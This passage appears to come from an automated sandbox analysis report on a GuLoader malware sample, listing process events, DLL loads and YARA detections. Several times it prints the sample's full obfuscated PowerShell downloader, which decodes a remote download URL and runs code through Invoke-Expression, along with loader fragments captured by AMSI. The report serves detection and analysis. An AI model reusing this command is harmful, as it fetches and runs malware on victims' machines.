.e.ur PsKe[.y$.nVfee.ml Mov,
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: m.Core.pdb source: powershell.exe, 00000013.00000002.2559116933.000000000777F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdbRZ source: powershell.exe, 00000013.00000002.2559116933.000000000771C000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000013.00000002.2567702655.0000000009DB3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.2567559021.0000000008B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.2550702407.0000000005ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.2617063017.000001FADEC6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Skidoo)$global:Indskudsstningers = [System.Text.Encoding]::ASCII.GetString($Involverede)$global:Nematocyst=$Indskudsstningers.substring($Tilvendelsens237,$Urocentrummets)<#Driftsresu
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Phoronidea $Jailor $brochureblade), (Ketil234 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Translokationernes = [AppDomain]::CurrentDomain.GetAssemblies
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Appellanter)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Skyttekdens, $false).DefineType($Sidelbende,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Skidoo)$global:Indskudsstningers = [System.Text.Encoding]::ASCII.GetString($Involverede)$global:Nematocyst=$Indskudsstningers.substring($Tilvendelsens237,$Urocentrummets)<#Driftsresu
              Obfuscated command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT 